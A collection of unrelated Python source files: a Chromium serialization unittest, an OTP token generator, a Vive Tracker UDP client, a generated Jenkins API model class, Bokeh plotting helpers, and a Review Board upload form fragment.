y = self.call_conv(self.conv2, y, edge_index, precomp, connection)
y = self.add_residual(y, x)
return self.nonlin2(y)
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from libs import structured_object
class _ObjectA(structured_object.StructuredObject): # pragma: no cover.
v = int
_unused = 2
def __init__(self, *args, **kwargs):
super(_ObjectA, self).__init__(*args, **kwargs)
self._private_attribute = 10
@property
def unused(self):
return 4
class _ObjectB(structured_object.StructuredObject):
v = dict
a = _ObjectA
class _DictOfObjectA(structured_object.TypedDict):
_value_type = _ObjectA
class _DictOfInt(structured_object.TypedDict):
# This is just for testing purpose. In practice we should use dict directly.
_value_type = int
class _ListOfObjectA(structured_object.TypedList):
_element_type = _ObjectA
class _ListOfStr(structured_object.TypedList):
# This is just for testing purpose. In practice we should use list directly.
_element_type = str
class _ObjectC(structured_object.StructuredObject):
da = _DictOfObjectA
la = _ListOfObjectA
d = _DictOfInt
l = _ListOfStr
class _Future(object):
pass
class SerilizableObjectTest(unittest.TestCase):
def testAttributeCached(self):
dynamic_definitions_attr_name = '_%s.%s._dynamic_definitions' % (
_ObjectA.__module__, _ObjectA.__name__)
self.assertFalse(hasattr(_ObjectA, dynamic_definitions_attr_name))
attributes = _ObjectA._GetDefinedAttributes()
expected_attributes = {'v': int}
self.assertDictEqual(expected_attributes, attributes)
self.assertTrue(hasattr(_ObjectA, dynamic_definitions_attr_name))
cached_attributes = getattr(_ObjectA, dynamic_definitions_attr_name)
self.assertDictEqual(expected_attributes, cached_attributes)
attributes = _ObjectA._GetDefinedAttributes()
self.assertTrue(attributes is cached_attributes)
def testToSerializable(self):
obj_a = _ObjectA()
obj_a.v = 1
obj_b = _ObjectB()
obj_b.v = {'key': 'value'}
obj_b.a = obj_a
data = obj_b.ToSerializable()
expected_data = {'a': {'v': 1}, 'v': {'key': 'value'}}
self.assertDictEqual(expected_data, data)
def testToSerializableForNoneValue(self):
obj_a = _ObjectA(v=None)
self.assertDictEqual({'v': None}, obj_a.ToSerializable())
def testFromSerializableNone(self):
obj_b = _ObjectB.FromSerializable(None)
self.assertIsNone(obj_b)
def testFromSerializable(self):
data = {'a': {'v': 1}, 'v': {'key': 'value'}}
obj_b = _ObjectB.FromSerializable(data)
self.assertDictEqual({'key': 'value'}, obj_b.v)
self.assertEqual(1, obj_b.a.v)
def testFromSerializableAssertionOnList(self):
with self.assertRaises(structured_object.DeserializationError):
_ObjectA.FromSerializable(['v'])
def testFromSerializableAssertionOnUndefinedAttribute(self):
with self.assertRaises(structured_object.DeserializationError):
_ObjectA.FromSerializable({'undefined': 1})
def testFromSerializableUndefinedAttributeAllowed(self):
_ObjectA._ignore_unknown_attributes = True
o = _ObjectA.FromSerializable({'undefined': 1, 'v': 1})
self.assertEqual(1, o.v)
def testFromSerializableAssertionOnMissingAttributeValue(self):
obj_a = _ObjectA.FromSerializable({})
self.assertIsNone(obj_a.v)
def testNotEqualForDifferentObjectType(self):
obj_a = _ObjectA(v=1)
self.assertNotEqual(obj_a, 'not a string object')
def testNotEqualForAttributeValue(self):
obj_a1 = _ObjectA(v=1)
obj_a2 = _ObjectA(v=3)
self.assertNotEqual(obj_a1, obj_a2)
def testEqualForSameValues(self):
data = {'a': {'v': 1}, 'v': {'key': 'value'}}
obj_b1 = _ObjectB.FromSerializable(data)
obj_b2 = _ObjectB(v={'key': 'value'}, a=_ObjectA(v=1))
self.assertEqual(obj_b1, obj_b2)
def testMultipeInstanceOfTheSameClass(self):
obj_a1 = _ObjectA()
obj_a1.v = 3
obj_a2 = _ObjectA()
obj_a2.v = 5
self.assertEqual(3, obj_a1.v)
self.assertEqual(5, obj_a2.v)
def testSettingPrivateAttribute(self):
obj_a = _ObjectA()
obj_a._private_attribute = 30
self.assertEqual(30, obj_a._private_attribute)
def testUndefinedPublicAttribute(self):
with self.assertRaises(AssertionError):
obj_a = _ObjectA()
setattr(obj_a, 'undefined', 'this should trigger an assertion')
def testTypeValidationInSettingValue(self):
with self.assertRaises(AssertionError):
obj_a = _ObjectA()
obj_a.v = 'not a string value'
def testTypeValidationAcceptNoneAsValue(self):
obj_a = _ObjectA()
obj_a.v = None
self.assertIsNone(obj_a.v)
def testCustomizedTypeValidationForBuiltInType(self):
f = _Future()
obj_a = _ObjectA(
type_validation_func=lambda _, x: isinstance(x, _Future), v=f)
d = obj_a.ToSerializable()
self.assertTrue(d['v'] is f)
obj_a.v = 10
d = obj_a.ToSerializable()
self.assertEqual(10, d['v'])
with self.assertRaises(AssertionError):
obj_a.v = 'this wrong type should trigger an assertion'
def testCustomizedTypeValidationForStructuredObject(self):
f = _Future()
obj_b = _ObjectB(
type_validation_func=lambda _, x: isinstance(x, _Future),
v={'a': 'b'},
a=f)
d = obj_b.ToSerializable()
self.assertDictEqual({'a': 'b'}, d['v'])
self.assertTrue(d['a'] is f)
obj_b.a = _ObjectA(v=1)
d = obj_b.ToSerializable()
self.assertDictEqual({'v': 1}, d['a'])
with self.assertRaises(AssertionError):
obj_b.a = 'this wrong type should trigger an assertion'
def testAccessingPrivateAttribute(self):
obj_a = _ObjectA()
self.assertEqual(10, obj_a._private_attribute)
def testTypedDict(self):
d = _DictOfObjectA()
obj_a = _ObjectA()
obj_a.v = 3
d['a'] = obj_a
self.assertEqual(obj_a, d['a'])
def testTypedDictWithPrimitiveTypes(self):
d = _DictOfInt()
d['a'] = 1
self.assertEqual(1, d['a'])
def testTypedDictOtherType(self):
with self.assertRaises(Exception):
d = _DictOfObjectA()
d[1] = 'a'
def testTypedDictDel(self):
d = _DictOfObjectA()
obj_a = _ObjectA()
obj_a.v = 3
d['a'] = obj_a
del d['a']
self.assertIsNone(d.get('a'))
def testTypedDictIter(self):
d = _DictOfObjectA()
obj_a = _ObjectA()
obj_a.v = 3
d['a'] = obj_a
for value in d.values():
self.assertTrue(isinstance(value, _ObjectA))
def testTypedDictLen(self):
d = _DictOfObjectA()
self.assertEqual(0, len(d))
def testTypedList(self):
l = _ListOfObjectA()
obj_a = _ObjectA()
obj_a.v = 3
l.append(obj_a)
obj_a2 = _ObjectA()
obj_a2.v = 1
l[0] = obj_a2
self.assertEqual(1, l[0].v)
def testTypedListWithPrimitiveTypes(self):
l = _ListOfStr()
l.append('str1')
l[0] = 'str2'
self.assertEqual('str2', l[0])
def testTypedListDel(self):
l = _ListOfObjectA()
obj_a = _ObjectA()
obj_a.v = 3
l.extend([obj_a])
del l[0]
self.assertEquals(0, len(l))
def testTypedListInsert(self):
l = _ListOfObjectA()
obj_a = _ObjectA()
obj_a.v = 3
l.insert(0, obj_a)
self.assertEqual(l[0], obj_a)
def testTypedListInsertOtherType(self):
with self.assertRaises(Exception):
l = _ListOfObjectA()
l.insert(0, 'b')
def testComplexTypesToSerializable(self):
obj_a1 = _ObjectA()
obj_a1.v = 1
obj_a2 = _ObjectA()
obj_a2.v = 2
obj_c = _ObjectC()
obj_c.da = _DictOfObjectA()
obj_c.da['a1'] = obj_a1
obj_c.da['a2'] = obj_a2
obj_c.la = _ListOfObjectA()
obj_c.la.append(obj_a2)
obj_c.la.insert(0, obj_a1)
obj_c.d = _DictOfInt()
obj_c.d['a1'] = 1
obj_c.d['a2'] = 2
obj_c.l = _ListOfStr()
obj_c.l.extend(['a', 'b'])
expected_dict = {
'da': {
'a1': {
'v': 1
},
'a2': {
'v': 2
}
},
'la': [{
'v': 1
}, {
'v': 2
}],
'd': {
'a1': 1,
'a2': 2
},
'l': ['a', 'b']
}
self.assertEqual(expected_dict, obj_c.ToSerializable())
def testComplexTypesFromSerializable(self):
data_dict = {
'da': {
'a1': {
'v': 1
},
'a2': {
'v': 2
}
},
'la': [{
'v': 1
}, {
'v': 2
}],
'd': {
'a1': 1,
'a2': 2
},
'l': ['a', 'b']
}
obj_c = _ObjectC.FromSerializable(data_dict)
self.assertEqual(data_dict, obj_c.ToSerializable())
def testBaseSerializableObjectEqual(self):
data_dict = {
'da': {
'a1': {
'v': 1
},
'a2': {
'v': 2
}
},
'la': [{
'v': 1
}, {
'v': 2
}],
'd': {
'a1': 1,
'a2': 2
},
'l': ['a', 'b']
}
obj_c1 = _ObjectC.FromSerializable(data_dict)
obj_c2 = _ObjectC.FromSerializable(data_dict)
self.assertEqual(obj_c1, obj_c2)
def testBaseSerializableObjectNotEqual(self):
obj_a1 = _ObjectA()
obj_a1.v = 1
obj_a2 = _ObjectA()
obj_a2.v = 2
da = _DictOfObjectA()
da['a1'] = obj_a1
da['a2'] = obj_a2
la = _ListOfObjectA()
la.append(obj_a1)
la.append(obj_a2)
self.assertTrue(da != la)
def testTypedDictFromSerializableNone(self):
self.assertIsNone(_DictOfObjectA.FromSerializable(None))
def testTypedListFromSerializableNone(self):
self.assertIsNone(_ListOfObjectA.FromSerializable(None))
|
<reponame>karakays/otp-py<filename>otp/token.py<gh_stars>1-10
# MIT License
#
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import base64
import hashlib
import hmac
import logging
import math
import time
from enum import Enum
logger = logging.getLogger(__name__)
class TokenCode:
def __init__(self, code, start, end):
self.start = start
self.end = end
self.code = code
self.window = end - start
@property
def progress(self):
"""
Returns the progress made until the expiry of the token
, between 0 and 1
"""
current = time.time()
if current >= self.end:
return 1
p = (current - self.start)
return (p / self.window)
@property
def remaining(self):
"""
Returns the duration in seconds in that token is still valid
"""
return math.ceil((1 - self.progress) * self.window)
class TokenType(Enum):
HOTP, TOTP = range(2)
@staticmethod
def fromValue(value):
if value == 'hotp':
return TokenType.HOTP
elif value == 'totp':
return TokenType.TOTP
else:
return None
def __str__(self):
return self.name.lower()
class Token:
def __init__(self, issuer, secret, **kwargs):
self.issuer = issuer
self.secret = secret
self._index = kwargs.get('index')
self.type = kwargs.get('type', 'totp')
self.user = kwargs.get('user')
self.period = kwargs.get('period', 30)
self.algorithm = kwargs.get('algorithm', 'SHA-1')
self.digits = kwargs.get('digits', 6)
@property
def uri(self):
"""
otpauh://TYPE/LABEL?PARAMS where
LABEL is issuer:user
"""
from urllib.parse import urlunsplit, urlencode
query = {'secret': base64.b32encode(self.secret), 'period': self.period,
'algorithm': self.algorithm, 'digits': self.digits}
return urlunsplit(('otpauth', self.type.__str__(),
self.issuer + ':' + self.user,
urlencode(query), None))
@property
def id(self):
return f'{self.issuer}:{self.user}'
def generateCode(self):
start = time.time()
counter = int(start / self.period)
logger.debug('counter=%s', counter)
mac = hmac.new(self.secret, counter.to_bytes(8, 'big'), hashlib.sha1)
digest = mac.digest()
logger.debug("%s:digest=%s", counter, " ".join([f"{b:02X}" for b in digest]))
offset = digest[len(digest) - 1] & 0x0F
logger.debug('%s:offset=%s', counter, offset)
# mask MSB
msb = digest[offset] & 0x7F
for i in range(1, 4):
msb <<= 8
msb |= digest[offset + i] & 0xFF
code = msb % (10 ** self.digits)
code = f"{code:06d}"
return TokenCode(code, (counter) * self.period,
(counter + 1) * self.period)
@classmethod
def fromUri(cls, uri):
from urllib.parse import parse_qs
scheme = uri.scheme
if scheme != 'otpauth':
raise InvalidTokenUriError('Invalid scheme', scheme)
token_type = TokenType.fromValue(uri.netloc)
if not token_type:
raise InvalidTokenUriError()
label = uri.path
if not label:
raise InvalidTokenUriError()
issuer, user = label[1:].split(':')
params = parse_qs(uri.query)
secret = params.get('secret')
secret = None if not secret else secret[0]
if not secret:
raise InvalidTokenUriError()
period = params.get('period')
try:
period = 30 if not period else int(period[0])
except ValueError:
raise InvalidTokenUriError()
digits = params.get('digits')
try:
digits = 6 if not digits else int(digits[0])
if digits not in (6, 7, 8):
raise ValueError
except ValueError:
raise InvalidTokenUriError()
issuer_q = params.get('issuer')
try:
if issuer_q:
if issuer and issuer_q[0] != issuer:
raise ValueError
else:
issuer = issuer_q[0]
except ValueError:
raise InvalidTokenUriError()
algorithm = params.get('algorithm')
try:
algorithm = 'SHA1' if not algorithm else algorithm[0]
if algorithm not in ('SHA1', 'SHA256', 'SHA512'):
raise ValueError
except ValueError:
raise InvalidTokenUriError()
return Token(token_type, issuer, user, secret,
period, algorithm, digits)
@classmethod
def fromString(cls, string):
from urllib.parse import urlparse, unquote
return Token.fromUri(urlparse(unquote(string)))
def __str__(self):
return f'{self.issuer}:{self.user}'
class InvalidTokenUriError(Exception):
def __init__(self, msg=None, value=None):
self.args = (msg, value)
self.msg = msg
self.value = value
|
"""
Defines Vive Tracker server. This script should run as is.
Example usage:
python vive_tracker_client.py --debug True
For Vive Tracker Server implementation, please see
https://github.com/wuxiaohua1011/ROAR_Desktop/blob/main/ROAR_Server/vive_tracker_server.py
"""
import socket
import sys
import logging
from typing import Optional
try:
from ROAR_Jetson.vive.models import ViveTrackerMessage
except:
from models import ViveTrackerMessage
import json
import time
from typing import Tuple
import argparse
from pathlib import Path
class ViveTrackerClient:
"""
Defines a vive tracker client that constantly polls message from (HOST, PORT)
and update its self.latest_tracker_message public variable
Other interacting script can initialize this ViveTracker Client as a sub-process and access its
latest_tracker_message for tracker data.
multiple vive tracker can be used at the same time by initializing multiple clients with different `tracker_name`
"""
def __init__(self, host: str, port: int, tracker_name: str,
time_out: float = 1, buffer_length: int = 1024,
should_record: bool = False,
output_file_path: Path = Path("../data/RFS_Track.txt")):
"""
Args:
host: Server's LAN Host address. (Ex: 192.168.1.7)
port: Server's LAN Port address. (Ex: 8000)
tracker_name: Tracker name (Ex: tracker_1)
time_out: time out for socket's receive. Will reset socket on timeout
buffer_length: maximum length of data it can receive at once
should_record: enable recording of data
output_file_path: output file's path
"""
self.host = host
self.port = port
self.tracker_name: str = tracker_name
self.time_out = time_out
self.buffer_length = buffer_length
self.socket: socket.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 20)
self.socket.settimeout(self.time_out)
self.latest_tracker_message: Optional[ViveTrackerMessage] = None
self.should_record = should_record
self.output_file_path = output_file_path
self.output_file = None
if self.should_record:
if self.output_file_path.parent.exists() is False:
self.output_file_path.parent.mkdir(exist_ok=True, parents=True)
self.output_file = self.output_file_path.open('w')
self.count = 0
self.logger = logging.getLogger(f"Vive Tracker Client [{self.tracker_name}]")
self.logger.info("Tracker Initialized")
def update(self):
"""
This client will send to the server the name of the tracker it is requesting
It will receive that tracker's information.
Updates the self.latest_vive_tracker_message field
Record self.latest_vive_tracker_message if needed
Returns:
None
"""
self.logger.info(f"Start Subscribing to [{self.host}:{self.port}] "
f"for [{self.tracker_name}] Vive Tracker Updates")
while True:
try:
_ = self.socket.sendto(self.tracker_name.encode(), (self.host, self.port))
data, addr = self.socket.recvfrom(self.buffer_length) # buffer size is 1024 bytes
parsed_message, status = self.parse_message(data.decode())
if status:
self.update_latest_tracker_message(parsed_message=parsed_message)
if self.should_record:
if self.count % 10 == 0:
self.output_file.write(f'{self.latest_tracker_message.x},'
f'{self.latest_tracker_message.y},'
f'{self.latest_tracker_message.z},'
f'{self.latest_tracker_message.roll},'
f'{self.latest_tracker_message.pitch},'
f'{self.latest_tracker_message.yaw}\n')
self.count += 1
else:
self.logger.error(f"Failed to parse incoming message [{data.decode()}]")
except socket.timeout:
self.logger.error("Timed out")
except ConnectionResetError as e:
self.logger.error(f"Error: {e}. Retrying")
except OSError as e:
pass
# self.logger.error(e)
except KeyboardInterrupt:
exit(1)
except Exception as e:
self.logger.debug(e)
def run_threaded(self):
pass
def shutdown(self):
"""
Safely shuts down the client and its connections
Returns:
"""
self.socket.close()
if self.output_file is not None:
self.output_file.close()
def update_latest_tracker_message(self, parsed_message):
"""
Given Vive Tracker message in JSON format, load json into dictionary format,
parse the tracker message using PyDantic
Assign self.latest_vive_tracker_message as the parsed result
Args:
parsed_message: tracker message in json format
Returns:
None
"""
try:
d = json.loads(json.loads(parsed_message))
vive_tracker_message = ViveTrackerMessage.parse_obj(d)
if vive_tracker_message.device_name == self.tracker_name:
self.latest_tracker_message = vive_tracker_message
self.logger.debug(self.latest_tracker_message)
except Exception as e:
self.logger.error(f"Error: {e} \nMaybe it is related to unable to parse buffer [{parsed_message}]. ")
@staticmethod
def parse_message(received_message: str) -> Tuple[str, bool]:
"""
Parse the received message by ensuring that it start and end with special "handshake" characters
Args:
received_message: string format of the received bytes
Returns:
parsed received message in string and whether the parsing was successful
"""
start = received_message.find("&")
end = received_message.find("\r")
if start == -1 or end == -1:
return "", False
else:
return received_message[start + 1:end], True
@staticmethod
def initialize_socket() -> socket.socket:
soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
soc.settimeout(3)
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except AttributeError:
pass # Some systems don't support SO_REUSEPORT
soc.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 20)
soc.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_LOOP, 1)
return soc
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--debug", default=False, help="debug flag", type=str2bool)
parser.add_argument("--collect",default=False, help="debug flag", type=str2bool)
args = parser.parse_args()
logging.basicConfig(format='%(asctime)s|%(name)s|%(levelname)s|%(message)s',
datefmt="%H:%M:%S", level=logging.DEBUG if args.debug is True else logging.INFO)
HOST, PORT = "192.168.1.19", 8000
client = ViveTrackerClient(host=HOST, port=PORT, tracker_name="tracker_1",
output_file_path=Path("../data/RFS_Track.txt"),
should_record=args.collect)
client.update() |
# coding: utf-8
"""
<NAME>
Jenkins API clients generated from Swagger / Open API specification # noqa: E501
The version of the OpenAPI document: 1.1.2-pre.0
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from openapi_client.configuration import Configuration
class InputStepImpl(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'_class': 'str',
'links': 'InputStepImpllinks',
'id': 'str',
'message': 'str',
'ok': 'str',
'parameters': 'list[StringParameterDefinition]',
'submitter': 'str'
}
attribute_map = {
'_class': '_class',
'links': '_links',
'id': 'id',
'message': 'message',
'ok': 'ok',
'parameters': 'parameters',
'submitter': 'submitter'
}
def __init__(self, _class=None, links=None, id=None, message=None, ok=None, parameters=None, submitter=None, local_vars_configuration=None): # noqa: E501
"""InputStepImpl - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self.__class = None
self._links = None
self._id = None
self._message = None
self._ok = None
self._parameters = None
self._submitter = None
self.discriminator = None
if _class is not None:
self._class = _class
if links is not None:
self.links = links
if id is not None:
self.id = id
if message is not None:
self.message = message
if ok is not None:
self.ok = ok
if parameters is not None:
self.parameters = parameters
if submitter is not None:
self.submitter = submitter
@property
def _class(self):
"""Gets the _class of this InputStepImpl. # noqa: E501
:return: The _class of this InputStepImpl. # noqa: E501
:rtype: str
"""
return self.__class
@_class.setter
def _class(self, _class):
"""Sets the _class of this InputStepImpl.
:param _class: The _class of this InputStepImpl. # noqa: E501
:type _class: str
"""
self.__class = _class
@property
def links(self):
"""Gets the links of this InputStepImpl. # noqa: E501
:return: The links of this InputStepImpl. # noqa: E501
:rtype: InputStepImpllinks
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this InputStepImpl.
:param links: The links of this InputStepImpl. # noqa: E501
:type links: InputStepImpllinks
"""
self._links = links
@property
def id(self):
"""Gets the id of this InputStepImpl. # noqa: E501
:return: The id of this InputStepImpl. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this InputStepImpl.
:param id: The id of this InputStepImpl. # noqa: E501
:type id: str
"""
self._id = id
@property
def message(self):
"""Gets the message of this InputStepImpl. # noqa: E501
:return: The message of this InputStepImpl. # noqa: E501
:rtype: str
"""
return self._message
@message.setter
def message(self, message):
"""Sets the message of this InputStepImpl.
:param message: The message of this InputStepImpl. # noqa: E501
:type message: str
"""
self._message = message
@property
def ok(self):
"""Gets the ok of this InputStepImpl. # noqa: E501
:return: The ok of this InputStepImpl. # noqa: E501
:rtype: str
"""
return self._ok
@ok.setter
def ok(self, ok):
"""Sets the ok of this InputStepImpl.
:param ok: The ok of this InputStepImpl. # noqa: E501
:type ok: str
"""
self._ok = ok
@property
def parameters(self):
"""Gets the parameters of this InputStepImpl. # noqa: E501
:return: The parameters of this InputStepImpl. # noqa: E501
:rtype: list[StringParameterDefinition]
"""
return self._parameters
@parameters.setter
def parameters(self, parameters):
"""Sets the parameters of this InputStepImpl.
:param parameters: The parameters of this InputStepImpl. # noqa: E501
:type parameters: list[StringParameterDefinition]
"""
self._parameters = parameters
@property
def submitter(self):
"""Gets the submitter of this InputStepImpl. # noqa: E501
:return: The submitter of this InputStepImpl. # noqa: E501
:rtype: str
"""
return self._submitter
@submitter.setter
def submitter(self, submitter):
"""Sets the submitter of this InputStepImpl.
:param submitter: The submitter of this InputStepImpl. # noqa: E501
:type submitter: str
"""
self._submitter = submitter
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, InputStepImpl):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, InputStepImpl):
return True
return self.to_dict() != other.to_dict()
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Any, Dict, List, Optional, Tuple, Union
import numpy as np
from bokeh.models import ColumnDataSource, FixedTicker, HoverTool
from bokeh.plotting import figure
from bokeh.plotting.figure import Figure
def style(plot: Figure) -> None:
"""
Style the given plot.
:param plot: Figure object to style.
"""
plot.outline_line_color = "black"
plot.grid.grid_line_alpha = 0.2
plot.grid.grid_line_color = "grey"
plot.grid.grid_line_width = 0.2
def bar_plot(
plot_source: ColumnDataSource,
orientation: Optional[str] = "vertical",
figure_kwargs: Optional[Union[Dict[str, Any], None]] = None,
plot_kwargs: Optional[Union[Dict[str, Any], None]] = None,
tooltips: Optional[Union[None, List[Tuple[str, str]]]] = None,
) -> Figure:
"""
Create and style a bar plot using the given `plot_source`.
:param plot_source: Bokeh `ColumnDataSource` object.
:param orientation: Can be one of "vertical" or "horizontal".
:param figure_kwargs: Figure options to pass to the Bokeh figure object.
:param plot_kwargs: Plot options to pass to the Bokeh figure object.
:param tooltips: A list of tuples Bokeh can use for hover tips.
:returns plot: The bar plot using Bokeh as the backend.
"""
if figure_kwargs is None:
figure_kwargs = {}
if plot_kwargs is None:
plot_kwargs = {}
x = np.array(plot_source.data["x"])
y = np.array(plot_source.data["y"])
tick_labels = plot_source.data["tick_labels"]
padding = 0.2
range_ = []
if orientation == "vertical":
y_range_start = 1 - padding
y_range_end = (1 + padding) * y.max()
log_bounds = [y_range_start, y_range_end]
minimum = (1 - padding) * y.min()
maximum = (1 + padding) * y.max()
no_log_bounds = [minimum, maximum]
range_ = (
log_bounds
if figure_kwargs.get("y_axis_type", None) is not None
else no_log_bounds
)
elif orientation == "horizontal":
x_range_start = 1 - padding
x_range_end = (1 + padding) * x.max()
log_bounds = [x_range_start, x_range_end]
minimum = (1 - padding) * x.min()
maximum = (1 + padding) * x.max()
no_log_bounds = [minimum, maximum]
range_ = (
log_bounds
if figure_kwargs.get("x_axis_type", None) is not None
else no_log_bounds
)
# Define default plot and figure keyword arguments.
fig_kwargs = {
"plot_width": 700,
"plot_height": 500,
"y_range" if orientation == "vertical" else "x_range": range_,
}
if figure_kwargs:
fig_kwargs.update(figure_kwargs)
plt_kwargs = {
"fill_color": "steelblue",
"fill_alpha": 0.7,
"line_color": "white",
"line_width": 1,
"line_alpha": 0.7,
"hover_fill_color": "orange",
"hover_fill_alpha": 1,
"hover_line_color": "black",
"hover_line_width": 2,
"hover_line_alpha": 1,
}
if plot_kwargs:
plt_kwargs.update(plot_kwargs)
# Create the plot.
plot = figure(**fig_kwargs)
# Bind data to the plot.
glyph = plot.quad(
left="left",
top="top",
right="right",
bottom="bottom",
source=plot_source,
**plt_kwargs,
)
if tooltips is not None:
tips = HoverTool(renderers=[glyph], tooltips=tooltips)
plot.add_tools(tips)
# Style the plot.
style(plot)
plot.xaxis.major_label_orientation = np.pi / 4
if orientation == "vertical":
plot.xaxis.ticker = FixedTicker(ticks=list(range(len(tick_labels))))
plot.xaxis.major_label_overrides = dict(zip(range(len(x)), tick_labels))
plot.xaxis.minor_tick_line_color = None
if orientation == "horizontal":
plot.yaxis.ticker = FixedTicker(ticks=list(range(len(tick_labels))))
plot.yaxis.major_label_overrides = dict(zip(range(len(y)), tick_labels))
plot.yaxis.minor_tick_line_color = None
return plot
def scatter_plot(
plot_source: ColumnDataSource,
figure_kwargs: Optional[Union[Dict[str, Any], None]] = None,
plot_kwargs: Optional[Union[Dict[str, Any], None]] = None,
tooltips: Optional[Union[None, List[Tuple[str, str]]]] = None,
) -> Figure:
"""
Style and create a scatter plot using the given `plot_source`.
:param plot_source: Bokeh `ColumnDataSource` object.
:param figure_kwargs: Figure options to pass to the Bokeh figure object.
:param plot_kwargs: Plot options to pass to the Bokeh figure object.
:param tooltips: A list of tuples Bokeh can use for hover tips.
:returns plot: The bar plot using Bokeh as the backend.
"""
if figure_kwargs is None:
figure_kwargs = {}
if plot_kwargs is None:
plot_kwargs = {}
# Define default plot and figure keyword arguments.
fig_kwargs = {
"plot_width": 700,
"plot_height": 500,
}
if figure_kwargs:
fig_kwargs.update(figure_kwargs)
plt_kwargs = {
"size": 10,
"fill_color": "steelblue",
"fill_alpha": 0.7,
"line_color": "white",
"line_width": 1,
"line_alpha": 0.7,
"hover_fill_color": "orange",
"hover_fill_alpha": 1,
"hover_line_color": "black",
"hover_line_width": 2,
"hover_line_alpha": 1,
}
if plot_kwargs:
plt_kwargs.update(plot_kwargs)
# Create the plot.
plot = figure(**fig_kwargs)
glyph = plot.circle(
x="x",
y="y",
source=plot_source,
**plt_kwargs,
)
if tooltips is not None:
tips = HoverTool(renderers=[glyph], tooltips=tooltips)
plot.add_tools(tips)
# Style the plot.
style(plot)
return plot
def line_plot(
plot_sources: List[ColumnDataSource],
labels: List[str],
colors: List[str],
figure_kwargs: Optional[Union[Dict[str, Any], None]] = None,
tooltips: Optional[Union[None, List[List[Tuple[str, str]]]]] = None,
) -> Figure:
"""
Style and create a line plot using the given `plot_source`.
:param plot_source: Bokeh `ColumnDataSource` object.
:param labels: Labels to use in the legend.
:param colors: Colors to use for multiple lines.
:param figure_kwargs: Figure options to pass to the Bokeh figure object.
:param tooltips: A list of tuples Bokeh can use for hover tips.
:returns plot: The bar plot using Bokeh as the backend.
"""
if figure_kwargs is None:
figure_kwargs = {}
# Define default plot and figure keyword arguments.
fig_kwargs = {
"plot_width": 700,
"plot_height": 500,
}
if figure_kwargs:
fig_kwargs.update(figure_kwargs)
plot = figure(**fig_kwargs)
for i, plot_source in enumerate(plot_sources):
locals()[f"glyph_{i}"] = plot.line(
x="x",
y="y",
source=plot_source,
color=colors[i],
legend_label=labels[i],
)
if tooltips:
plot.add_tools(
HoverTool(
renderers=[locals()[f"glyph_{i}"]],
tooltips=tooltips[i],
)
)
# Style the plot.
style(plot)
return plot
|
<gh_stars>100-1000
from __future__ import unicode_literals
from uuid import uuid4
import os
from django import forms
from reviewboard.attachments.mimetypes import get_uploaded_file_mimetype
from reviewboard.attachments.models import (FileAttachment,
FileAttachmentHistory)
from reviewboard.reviews.models import ReviewRequestDraft
class UploadFileForm(forms.Form):
"""A form that handles uploading of new files."""
#: The caption for the file.
caption = forms.CharField(required=False)
#: The file itself.
path = forms.FileField(required=True)
